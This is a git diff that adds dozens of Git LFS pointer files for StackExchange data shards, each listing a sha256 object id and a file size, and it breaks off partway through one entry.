b/data/stackexchange/1-1/1557_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a21ab243d9e7ea765aba6a0c92779cfccf38d6b --- /dev/null +++ b/data/stackexchange/1-1/1557_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e1383d1b4669d7c2c4307768b5654829a3ea5313808b081727241fe4636919c4 +size 37401806 diff --git a/data/stackexchange/1-1/1558_2289.jsonl b/data/stackexchange/1-1/1558_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0d4885c0a445ba52a8c6b8c586baf00985c3a267 --- /dev/null +++ b/data/stackexchange/1-1/1558_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4a1f6ce7fff28dc0881c185016fbe6024c27b07d9d33b246bc6c57fc101e01a8 +size 37357085 diff --git a/data/stackexchange/1-1/1559_2289.jsonl b/data/stackexchange/1-1/1559_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b60055981d7ccb54733017913172afcb2606132e --- /dev/null +++ b/data/stackexchange/1-1/1559_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:89b8e2a4f73b9a91716cd5301d1bbadeda1f656119a33c4a532d5aeb1cedadf5 +size 36649577 diff --git a/data/stackexchange/1-1/155_2289.jsonl b/data/stackexchange/1-1/155_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..82db2c505c479d013e0b6e0b8db2335891f3f84b --- /dev/null +++ b/data/stackexchange/1-1/155_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9bbdf7fd9d9c90dbbea00874886bc5f7cfd255d703a842e4611a5aeec425ef3 +size 34615685 diff --git a/data/stackexchange/1-1/1560_2289.jsonl b/data/stackexchange/1-1/1560_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78fbdcc3c10d60f181925667dd6e2c3cddb11507 --- /dev/null +++ b/data/stackexchange/1-1/1560_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:370054f853a722ae46a35b9020f7ef6e7700478863be2f7093e0848dc6fa4738 +size 37073803 diff --git a/data/stackexchange/1-1/1561_2289.jsonl b/data/stackexchange/1-1/1561_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ccb7cd6781bf7d90faa1587bcea14ad50bcf2855 --- /dev/null +++ b/data/stackexchange/1-1/1561_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:20173661f1b2ee8c36985609c272f1790c2073a5c965fdd160fe9d21701a6ba7 +size 37020762 diff --git a/data/stackexchange/1-1/1562_2289.jsonl b/data/stackexchange/1-1/1562_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..76e2efe2c4d28e6fa37d75d8354a6ba2c67cc20c --- /dev/null +++ b/data/stackexchange/1-1/1562_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d3a8690d897b42111ff02df28576cfaa65f343341ee598e2071d83027f2fb57 +size 36426851 diff --git a/data/stackexchange/1-1/1563_2289.jsonl b/data/stackexchange/1-1/1563_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..823304f512c77baf0286eac9e118eba6867c0e95 --- /dev/null +++ b/data/stackexchange/1-1/1563_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d008075549c3f36c9ff223224d2eea1f641f5ecaf6815c7e3a01c6a21fd2d34c +size 36974329 diff --git a/data/stackexchange/1-1/1564_2289.jsonl b/data/stackexchange/1-1/1564_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..629c2d52edda04c64938bf1f094d4cb7a81a0769 --- /dev/null +++ b/data/stackexchange/1-1/1564_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a97c168058141b3e8c4fb175da43d548ce31e0bcee80cbfee3f2c3cdf632381a +size 36948778 diff --git a/data/stackexchange/1-1/1565_2289.jsonl b/data/stackexchange/1-1/1565_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ba760656f8fe6681126c9ba5ba7452b48da4c297 --- /dev/null +++ b/data/stackexchange/1-1/1565_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2055474514ccf517a5ba075cdd8ead62bb6852984ce790d128c25f05ae7000e0 +size 36839994 diff --git a/data/stackexchange/1-1/1566_2289.jsonl b/data/stackexchange/1-1/1566_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..adbc6481497e4ec90a7f98f1668bcb62bda7a1b6 --- /dev/null +++ b/data/stackexchange/1-1/1566_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:473739ec07ee8544955dbef8898f406cc8ba4710e776def7e34861de1131c0df +size 35888577 diff --git a/data/stackexchange/1-1/1567_2289.jsonl b/data/stackexchange/1-1/1567_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cc2c5a21fd45fa6a9e3c97cf6f67920414a6fe2f --- /dev/null +++ b/data/stackexchange/1-1/1567_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2172ea15a0e03c02263d30235d91dd8e4779e95f85a6cf232e43fe4dcbeab85 +size 37333698 diff --git a/data/stackexchange/1-1/1568_2289.jsonl b/data/stackexchange/1-1/1568_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7ef6733879be1302ebbc41bea2c9c7970200ab53 --- /dev/null +++ b/data/stackexchange/1-1/1568_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ccf749fbb075f2505b93527b3d8afba447512789863f8a2b3a4a1bdbe96e4f7 +size 36558439 diff --git a/data/stackexchange/1-1/1569_2289.jsonl b/data/stackexchange/1-1/1569_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb5004a5fd13d4ab89d0e9b8eba1f8bfb379b011 --- /dev/null +++ b/data/stackexchange/1-1/1569_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2133358220753f8d86f3c0b72ddf9c5e506610203c1673a8103b03e760acd6a5 +size 36167235 diff --git a/data/stackexchange/1-1/156_2289.jsonl b/data/stackexchange/1-1/156_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..66e07174ef1e63e02dc6fd5e762f163add72e2b5 --- /dev/null +++ b/data/stackexchange/1-1/156_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42a598e0136acb0b875a75624389332ab971f9dc8850e9825316814db04deabf +size 34674997 diff --git a/data/stackexchange/1-1/1570_2289.jsonl b/data/stackexchange/1-1/1570_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..494a4f16e1ad51d679999918acf83e489f24bd5f --- /dev/null +++ b/data/stackexchange/1-1/1570_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5fea679e016d431c8481975d0a208b77dab84a64c103c28f514021a54fa991a8 +size 36635256 diff --git a/data/stackexchange/1-1/1571_2289.jsonl b/data/stackexchange/1-1/1571_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e5306a8384a8fc5b626d657daddbdbdfa35643c --- /dev/null +++ b/data/stackexchange/1-1/1571_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6bb1dacaa8e3934132e6f543717004299e827d2b52447c4fa81e75b06166ff0b +size 37204033 diff --git a/data/stackexchange/1-1/1572_2289.jsonl b/data/stackexchange/1-1/1572_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7fad082de26ac339211c165109ed2b6e6385d83b --- /dev/null +++ b/data/stackexchange/1-1/1572_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a276f65960203f6ff59179ad94183eb1110ff0aaac52bbc64afbc190c6bfc752 +size 36787260 diff --git a/data/stackexchange/1-1/1573_2289.jsonl b/data/stackexchange/1-1/1573_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0cd652bcf300fab58f0ae2a49f245093f974ed19 --- /dev/null +++ b/data/stackexchange/1-1/1573_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f68013a94afa4313002798e15e9b2c93a18c4c590906c03cc486b4972d9fa22 +size 36784987 diff --git a/data/stackexchange/1-1/1574_2289.jsonl b/data/stackexchange/1-1/1574_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..813e98e106624177ff9573e5e4b7bc5ad3b7c774 --- /dev/null +++ b/data/stackexchange/1-1/1574_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5438597a48a0e636197d2cec7f718259fed672bb0e8aa36e43991ec0635f0831 +size 37170712 diff --git a/data/stackexchange/1-1/1575_2289.jsonl b/data/stackexchange/1-1/1575_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6b239191df331db08d6ffc94ceaaf54d3f03eba5 --- /dev/null +++ b/data/stackexchange/1-1/1575_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5741269223549d4aa3f01fec916119a990463061de68bc01dd55117a267f3720 +size 36976671 diff --git a/data/stackexchange/1-1/1576_2289.jsonl b/data/stackexchange/1-1/1576_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6449b37668802091982e9220c8cd4cf3a018cc4d --- /dev/null +++ b/data/stackexchange/1-1/1576_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38bbdbed8e50052ea9b0f8952bd2e9372e17faeee4db6739ab743ff416b5b535 +size 36536677 diff --git a/data/stackexchange/1-1/1577_2289.jsonl b/data/stackexchange/1-1/1577_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf13d5d574e96c9f92b0a019a1ca206bbcae7195 --- /dev/null +++ b/data/stackexchange/1-1/1577_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:114a4a93e72122e5e7e5be53a65fdcc1a746ba1e197f6bd9dac36fc3f60f349e +size 36364041 diff --git a/data/stackexchange/1-1/1578_2289.jsonl b/data/stackexchange/1-1/1578_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec47e6c1a2f81b24a7badffc46d8c6d8112ef94c --- /dev/null +++ b/data/stackexchange/1-1/1578_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b11e4daf20372d4c8c0bf94acf2be6dfd88cce4c10cb338f354e403297dd292d +size 37214153 diff --git a/data/stackexchange/1-1/1579_2289.jsonl b/data/stackexchange/1-1/1579_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bfbd8ac456ab1e0b93b626942e617a8cb9fa47e0 --- /dev/null +++ b/data/stackexchange/1-1/1579_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a351f8d558bc4924dfe2df46aee0d58ade6576515b51822203272acef7ad80fc +size 36796492 diff --git a/data/stackexchange/1-1/157_2289.jsonl b/data/stackexchange/1-1/157_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..77f587f1d91d9e9c7dda9c7ca1e337af3f7bbb80 --- /dev/null +++ b/data/stackexchange/1-1/157_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ad9f149baa3ba39bcc9928cf60081dcef2ed7c13c9c132f3eff651dc3b566ef +size 34903186 diff --git a/data/stackexchange/1-1/1580_2289.jsonl b/data/stackexchange/1-1/1580_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb25856c59ee78c2d95411b4dcdc87f1ead78048 --- /dev/null +++ b/data/stackexchange/1-1/1580_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fa01c6435e68e760ff4ed2157096d17d315ab8d6a10dda4a85529037252b9b90 +size 36678605 diff --git a/data/stackexchange/1-1/1581_2289.jsonl b/data/stackexchange/1-1/1581_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9d13a5b97c4113e19ca555714fc754a3a1e19c49 --- /dev/null +++ b/data/stackexchange/1-1/1581_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2445dc1e6eae0a210dc39cd2cf27f4f1e2c8ff2583de0b2a991fcfab68b52f8 +size 37418809 diff --git a/data/stackexchange/1-1/1582_2289.jsonl b/data/stackexchange/1-1/1582_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..25ee37bf403e7bb85e525480e486276010d92754 --- /dev/null +++ b/data/stackexchange/1-1/1582_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ddedf11430d8a9a278abc00ce96c6dc4a81a6637fe20ea93bf6ab20c6aa2b91 +size 36834460 diff --git a/data/stackexchange/1-1/1583_2289.jsonl b/data/stackexchange/1-1/1583_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..76d8c8e1b65bae4a2722a77702e06d0fcf2d8e7d --- /dev/null +++ b/data/stackexchange/1-1/1583_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3c9a7f2de98041b2390ab92a21aa2e071aad7f09771319055f904f2493dce73f +size 37584977 diff --git a/data/stackexchange/1-1/1584_2289.jsonl b/data/stackexchange/1-1/1584_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a676156d56ef29258e3b8448c20f4c05f00ada4f --- /dev/null +++ b/data/stackexchange/1-1/1584_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13893315d9c8936b0816ae0317424657389d3220b166cb6a0c8d1cddb2b5172b +size 36405049 diff --git a/data/stackexchange/1-1/1585_2289.jsonl b/data/stackexchange/1-1/1585_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..75a49299fc8b7005c6308ebcf2225eb825819810 --- /dev/null +++ b/data/stackexchange/1-1/1585_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38cd6d81caa86cc2fd7b45cd92f1fc80c62b1206947c09a2c8a60b039a840089 +size 36482800 diff --git a/data/stackexchange/1-1/1586_2289.jsonl b/data/stackexchange/1-1/1586_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..50ff9dbc373e5638a36d79832b218bf3ffb312bf --- /dev/null +++ b/data/stackexchange/1-1/1586_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1e720782094778bcc3c4cd7e7c2164eecccc28cc2fcd0d5c6d600193cf974e38 +size 37074537 diff --git a/data/stackexchange/1-1/1587_2289.jsonl b/data/stackexchange/1-1/1587_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a9eeec641a018148f20a0b73596c25a578e001c --- /dev/null +++ b/data/stackexchange/1-1/1587_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cdba099e5b97a677b5466471965862da7ae096f2e1f8e2ce22703cb97daa4eae +size 36949135 diff --git a/data/stackexchange/1-1/1588_2289.jsonl b/data/stackexchange/1-1/1588_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..13d9b2dc346b214c21b3964505542256acad1c1b --- /dev/null +++ b/data/stackexchange/1-1/1588_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a33cd4214fc7204fbd5cf8a3f6b579c8829632958c99ab07dcfe234b5a717fd9 +size 37001266 diff --git a/data/stackexchange/1-1/1589_2289.jsonl b/data/stackexchange/1-1/1589_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6915d6568ca0de51b35126818e86040aff61baac --- /dev/null +++ b/data/stackexchange/1-1/1589_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f77a969e5d09262dfd527872b89b820196356cdc556bfb656862b022bac54d5a +size 34791116 diff --git a/data/stackexchange/1-1/158_2289.jsonl b/data/stackexchange/1-1/158_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d42791811f5234d33c5918ddafd37b867ecff1d8 --- /dev/null +++ b/data/stackexchange/1-1/158_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:469b907eb80239c648308f2dbdc5760d30c4f566a3217f0365aa01ced3aaf3d6 +size 34771851 diff --git a/data/stackexchange/1-1/1590_2289.jsonl b/data/stackexchange/1-1/1590_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5ffb7bf0e9d4e25cdfceb9a8d651bb0f34e1cc07 --- /dev/null +++ b/data/stackexchange/1-1/1590_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b5e9f67806e859912b575753a4f8ef4b6c814508dbfd883d6473fd0c5560024 +size 34361306 diff --git a/data/stackexchange/1-1/1591_2289.jsonl b/data/stackexchange/1-1/1591_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..245b795dfc95b289f6a6950861836a3d9e99f8c5 --- /dev/null +++ b/data/stackexchange/1-1/1591_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67878b7c0ab158ea7e71d81dda9bdeb876ae85649e2495ffd56e97b3553448ad +size 34559306 diff --git a/data/stackexchange/1-1/1592_2289.jsonl b/data/stackexchange/1-1/1592_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3d3248a516b70ba5a580af16f7e543edf257932e --- /dev/null +++ b/data/stackexchange/1-1/1592_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e56f4179383edfddcfbe5df7e5943948988ad94769500dc53e840d86d7bda386 +size 34750243 diff --git a/data/stackexchange/1-1/1593_2289.jsonl b/data/stackexchange/1-1/1593_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1eefabb1fcc4e817479b002f3cc7a64dd4e37fcd --- /dev/null +++ b/data/stackexchange/1-1/1593_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f63e4ac59f1097ff241f7a57ce7ee860b56ee2b9272adbb231e5587a6f0f46d0 +size 34189608 diff --git a/data/stackexchange/1-1/1594_2289.jsonl b/data/stackexchange/1-1/1594_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0c92f263d3c9ff6f83729ee1817f090d96232513 --- /dev/null +++ b/data/stackexchange/1-1/1594_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:089a4bbfe2a9f54db1d9761d2aa0bf6c9ef543829440fdb09cc93015b19e49d9 +size 34908086 diff --git a/data/stackexchange/1-1/1595_2289.jsonl b/data/stackexchange/1-1/1595_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b42aeebdef7be0786ef71c9b41eba8bcbfb8202c --- /dev/null +++ b/data/stackexchange/1-1/1595_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7d938d91511eb5ad2657cfcb7b55dd6dbd393fd41f67f2e85fe66d5937e97210 +size 34417570 diff --git a/data/stackexchange/1-1/1596_2289.jsonl b/data/stackexchange/1-1/1596_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7ab91a55b858fbc621c1da4ec194703492c791d6 --- /dev/null +++ b/data/stackexchange/1-1/1596_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:272e39fbe0a4b2c3719b485a20c4598d83f3a09c50763224643dab26fb00c657 +size 34896312 diff --git a/data/stackexchange/1-1/1597_2289.jsonl b/data/stackexchange/1-1/1597_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cf705cc17c74dcc745dcaf6a86bf1c54d7107f4b --- /dev/null +++ b/data/stackexchange/1-1/1597_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:673e85037f6ee5706ebeffe65f036ba90d672f8d322ca24865c6f33000b9e600 +size 34592190 diff --git a/data/stackexchange/1-1/1598_2289.jsonl b/data/stackexchange/1-1/1598_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ee1086817640eeb50e79f79d944b649bad9d84ea --- /dev/null +++ b/data/stackexchange/1-1/1598_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c045f300b1d8430c1afcb81bde7b381677820412724b08385fb8985f5789047 +size 34053791 diff --git a/data/stackexchange/1-1/1599_2289.jsonl b/data/stackexchange/1-1/1599_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a5541da152c9962e63176b1cbfaac42ead615fd --- /dev/null +++ b/data/stackexchange/1-1/1599_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4654df641f357c0f11b01be77a939aed675b7c1dbb8c97536b36f2a659d5df4e +size 34096911 diff --git a/data/stackexchange/1-1/159_2289.jsonl b/data/stackexchange/1-1/159_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0bd0689af59a792438d2dcfa203c88157d95720 --- /dev/null +++ b/data/stackexchange/1-1/159_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b49ac31b51a84fd8e91e89ce7f9558e2dee490778027d2d75b91aabf3f2733b +size 34455718 diff --git a/data/stackexchange/1-1/15_2289.jsonl b/data/stackexchange/1-1/15_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0fa40ec6393cdbd02cb82ec8072296b05d0187fd --- /dev/null +++ b/data/stackexchange/1-1/15_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d062a554f7a00a44fa7f59834ba85fc3fc180052c3aa03e0220c48b484fc2cb8 +size 35966710 diff --git a/data/stackexchange/1-1/1600_2289.jsonl b/data/stackexchange/1-1/1600_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7b0767d3373c831094523640333c318dde3acdd5 --- /dev/null +++ b/data/stackexchange/1-1/1600_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f7fd99bb39799a9c0cf4b8adf12ab53ba1fca53b5bb9e187c3d3767da5769f6a +size 34295670 diff --git a/data/stackexchange/1-1/1601_2289.jsonl b/data/stackexchange/1-1/1601_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a319f779094f2d49d032f0327c90a04c9b9642eb --- /dev/null +++ b/data/stackexchange/1-1/1601_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8419431d80737122351cb114fae2d2b1030782cca8639ce6156a35551059fc2 +size 34560284 diff --git a/data/stackexchange/1-1/1602_2289.jsonl b/data/stackexchange/1-1/1602_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7e0e8e24bfbbdc3a1d5c66f16c1b10d19ada6de --- /dev/null +++ b/data/stackexchange/1-1/1602_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdcd1f7f2fb5b6e96047a9269c7794958047a6fe7dc36933e873aa1770dcfb3f +size 34553178 diff --git a/data/stackexchange/1-1/1603_2289.jsonl b/data/stackexchange/1-1/1603_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f874b8748eda4aa8f4e3b79a3c76f4f27343434f --- /dev/null +++ b/data/stackexchange/1-1/1603_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42d198627117e776dd63bf3c8445d4b65429264748d6c30d92cc4d933cbc95d2 +size 34773197 diff --git a/data/stackexchange/1-1/1604_2289.jsonl b/data/stackexchange/1-1/1604_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a39f2e534695f64665b06f310778fbb9f272126 --- /dev/null +++ b/data/stackexchange/1-1/1604_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c0577a0306314443275d70bc51895457096d5c2190943000149e25a8e4ced9f +size 34421995 diff --git a/data/stackexchange/1-1/1605_2289.jsonl b/data/stackexchange/1-1/1605_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c756929b07f88cbce0ec64a3f6af71e303cb811 --- /dev/null +++ b/data/stackexchange/1-1/1605_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd366f0038fae6bee5bbe308df69ebf60377ce850f612ee67a75679815e3fd3e +size 34559270 diff --git a/data/stackexchange/1-1/1606_2289.jsonl b/data/stackexchange/1-1/1606_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed6c44f24df218cbcfd68a4328046a9ca637cbdf --- /dev/null +++ b/data/stackexchange/1-1/1606_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da28252ebb4d750f138860fad98f5ab231daa45e21e9029b7fa3dca372d8f0f5 +size 34921496 diff --git a/data/stackexchange/1-1/1607_2289.jsonl b/data/stackexchange/1-1/1607_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae24612a4cccd507e393d91f11979e70e2ed4a4e --- /dev/null +++ b/data/stackexchange/1-1/1607_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:121ac1f32bc8a089bca0dcd0f6b204be613b058671d2d9f1272088de2f8ae6a5 +size 34852742 diff --git a/data/stackexchange/1-1/1608_2289.jsonl b/data/stackexchange/1-1/1608_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..535dd51aadb0709817e3caf480103639018c0f4e --- /dev/null +++ b/data/stackexchange/1-1/1608_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90ee486baf9b140727cf365d7939a9e1566b3f4be0b135616d4cadb96419bc9c +size 34410418 diff --git a/data/stackexchange/1-1/1609_2289.jsonl b/data/stackexchange/1-1/1609_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c053c7c49b4a20f918093f364006e4d6d183ba2 --- /dev/null +++ b/data/stackexchange/1-1/1609_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ac1aa3d61f2f34cced7916265e24f56b5d123fe83247a59db3d5353280f1d604 +size 34155638 diff --git a/data/stackexchange/1-1/160_2289.jsonl b/data/stackexchange/1-1/160_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a518bdd09cda867cd78659043bfba6401099f69 --- /dev/null +++ b/data/stackexchange/1-1/160_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95cb82b44ac6aa1e2f2b0197e77d627b1acb78b826216c39ce7a9e566acad380 +size 34764207 diff --git a/data/stackexchange/1-1/1610_2289.jsonl b/data/stackexchange/1-1/1610_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ccee47e131dd872d30512358d13afe4e9c79a06f --- /dev/null +++ b/data/stackexchange/1-1/1610_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:350e3592dcbe91a21e2e6b95b3beefcfaeae900b84d01415635b83457523d3e2 +size 34487598 diff --git a/data/stackexchange/1-1/1611_2289.jsonl b/data/stackexchange/1-1/1611_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b1ed0e1386de1e02586ab5786a2d6365b9c98024 --- /dev/null +++ b/data/stackexchange/1-1/1611_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d940d08c8cbb467ce707dfdb8211d983cce4c68f6c2b268f1f9ea05711e2d5f0 +size 35010625 diff --git a/data/stackexchange/1-1/1612_2289.jsonl b/data/stackexchange/1-1/1612_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1fd81f6272bb03162305c447896837e37fdc109e --- /dev/null +++ b/data/stackexchange/1-1/1612_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:688ba9c94f2c23e4fbd8083966bd0c41d5804b6c0e82425f732985a6708cf19d +size 34787075 diff --git a/data/stackexchange/1-1/1613_2289.jsonl b/data/stackexchange/1-1/1613_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63898c77d8c4b5311c446b933426903f01518122 --- /dev/null +++ b/data/stackexchange/1-1/1613_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2f333c69c55c52fa032968af769dd4e14580213a6660dc1ab34e7a9ddf7acd6 +size 34304089 diff --git a/data/stackexchange/1-1/1614_2289.jsonl b/data/stackexchange/1-1/1614_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..04615b942f10ae69fffeb68afb7b9506a156383c --- /dev/null +++ b/data/stackexchange/1-1/1614_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c8da8e9e3419250bce0c9ca926fc9caa8846febea58f5cf742e713be22fc515 +size 34467321 diff --git a/data/stackexchange/1-1/1615_2289.jsonl b/data/stackexchange/1-1/1615_2289.jsonl new file mode 100644 index 